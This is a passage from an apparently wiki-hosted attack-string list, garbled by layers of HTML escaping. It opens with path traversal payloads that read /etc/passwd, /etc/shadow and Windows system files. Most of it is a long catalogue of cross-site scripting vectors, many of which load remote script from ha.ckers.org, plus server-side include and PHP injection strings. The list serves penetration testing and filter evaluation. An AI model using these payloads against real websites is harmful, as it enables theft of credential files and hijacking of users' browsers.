/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/passwd\\&amp;amp;amp;apos;&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/shadow\\&amp;amp;amp;apos;&lt;br /&gt;
../../../../../../../../conf/server.xml&lt;br /&gt;
/../../../../../../../../bin/id|&lt;br /&gt;
C:/inetpub/wwwroot/global.asa&lt;br /&gt;
C:\inetpub\wwwroot\global.asa&lt;br /&gt;
C:/boot.ini&lt;br /&gt;
C:\boot.ini&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
../../../../../../../../../../../../boot.ini%00&lt;br /&gt;
../../../../../../../../../../../../boot.ini&lt;br /&gt;
/./././././././././././boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00&lt;br /&gt;
/../../../../../../../../../../../boot.ini&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../boot.ini&lt;br /&gt;
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.html&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.jpg&lt;br /&gt;
/.../.../.../.../.../&lt;br /&gt;
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
''Sorry for breaking the layout - but &amp;quot;breaking the layout&amp;quot; could become &amp;quot;breaking the software&amp;quot;.'' &lt;br /&gt;
&lt;br /&gt;
=== XSS Statements - Most effective/most common statements  ===&lt;br /&gt;
&lt;br /&gt;
Testing Statements &lt;br /&gt;
&amp;lt;pre&amp;gt;';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//&amp;quot;;alert(String.fromCharCode(88,83,83))//\&amp;quot;;alert(String.fromCharCode(88,83,83))//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt; &lt;br /&gt;
'';!--&amp;quot;&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
Common exploit code (covers a lot of XSS vulnerabilities) &lt;br /&gt;
&amp;lt;pre&amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt='&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=&amp;quot;&lt;br /&gt;
\'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=\'&lt;br /&gt;
'); alert('xss'); var x='&lt;br /&gt;
\\'); alert(\'xss\');var x=\'&lt;br /&gt;
//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83));&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== XSS Statements (Full List) - (Update: 11 August 2009 - Total Statements: 162) &lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=javascript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=`javascript:alert(&amp;quot;&amp;quot;RSnake says, 'XSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;ascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;IMG SRC=java\0script:alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;SCR\0IPT&amp;amp;gt;alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;lt;/SCR\0IPT&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot; &amp;amp;amp;#14;  javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/XSS SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY onload!#$%&amp;amp;amp;()*~+-_.,:;?@[/|\]^`=alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&amp;amp;lt;B&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=//ha.ckers.org/.j&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;iframe src=http://ha.ckers.org/scriptlet.html &amp;amp;lt;&lt;br /&gt;
&amp;amp;lt;SCRIPT&amp;amp;gt;a=/XSS/\nalert(a.source)&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;\&amp;quot;&amp;quot;;alert('XSS');//&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;/TITLE&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;INPUT TYPE=&amp;quot;&amp;quot;IMAGE&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;BODY ONLOAD=alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG DYNSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG LOWSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BGSOUND SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BR SIZE=&amp;quot;&amp;quot;&amp;amp;amp;{alert('XSS')}&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LAYER SRC=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/LAYER&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;http://ha.ckers.org/xss.css&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;STYLE&amp;amp;gt;@import'http://ha.ckers.org/xss.css';&amp;amp;lt;/STYLE&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Link&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;&amp;amp;lt;http://ha.ckers.org/xss.css&amp;amp;gt;; REL=stylesheet&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;BODY{-moz-binding:url(&amp;quot;&amp;quot;http://ha.ckers.org/xssmoz.xml#xss&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;behavior: url(xss.htc);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;li {list-style-image: url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;UL&amp;amp;gt;&amp;amp;lt;LI&amp;amp;gt;XSS&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC='vbscript:msgbox(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)'&amp;amp;gt;&amp;quot;&lt;br /&gt;
¼script¾alert(¢XSS¢)¼/script¾&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0; URL=http://;URL=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IFRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/IFRAME&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;FRAMESET&amp;amp;gt;&amp;amp;lt;FRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/FRAMESET&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE&amp;amp;gt;&amp;amp;lt;TD BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(&amp;amp;amp;#1;javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;width: expression(alert('XSS'));&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;@im\port'\ja\vasc\ript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)';&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG STYLE=&amp;quot;&amp;quot;xss:expr/*XSS*/ession(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;xss:expression(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;exp/*&amp;amp;lt;A STYLE='no\xss:noxss(&amp;quot;&amp;quot;*//*&amp;quot;&amp;quot;);xss:ex/*XSS*//*/*/pression(alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;))'&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE TYPE=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;alert('XSS');&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;.XSS{background-image:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;A CLASS=XSS&amp;amp;gt;&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE type=&amp;quot;&amp;quot;text/css&amp;quot;&amp;quot;&amp;amp;gt;BODY{background:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;!--[if gte IE 4]&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS');&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;![endif]--&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BASE HREF=&amp;quot;&amp;quot;javascript:alert('XSS');//&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;OBJECT TYPE=&amp;quot;&amp;quot;text/x-scriptlet&amp;quot;&amp;quot; DATA=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&amp;amp;gt;&amp;amp;lt;param name=url value=javascript:alert('XSS')&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.swf&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==&amp;quot;&amp;quot; type=&amp;quot;&amp;quot;image/svg+xml&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML&amp;amp;gt;&amp;amp;lt;BODY&amp;amp;gt;&amp;amp;lt;?xml:namespace prefix=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; ns=&amp;quot;&amp;quot;urn:schemas-microsoft-com:time&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;#default#time2&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;t:set attributeName=&amp;quot;&amp;quot;innerHTML&amp;quot;&amp;quot; to=&amp;quot;&amp;quot;XSS&amp;amp;lt;SCRIPT DEFER&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/BODY&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.jpg&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo '&amp;amp;lt;SCR'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;? echo('&amp;amp;lt;SCR)';echo('IPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;');&amp;amp;nbsp;?&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Set-Cookie&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;USERID=&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS')&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HEAD&amp;amp;gt;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;CONTENT-TYPE&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;text/html; charset=UTF-7&amp;quot;&amp;quot;&amp;amp;gt; &amp;amp;lt;/HEAD&amp;amp;gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT =&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; '' SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT &amp;quot;&amp;quot;a='&amp;amp;gt;'&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=`&amp;amp;gt;` SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT&amp;amp;gt;document.write(&amp;quot;&amp;quot;&amp;amp;lt;SCRI&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;PT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://66.102.7.147/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://1113982867/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0x42.0x0000066.0x7.0x93/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0102.0146.0007.00000223/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;h\ntt\tp://6&amp;quot;&lt;br /&gt;
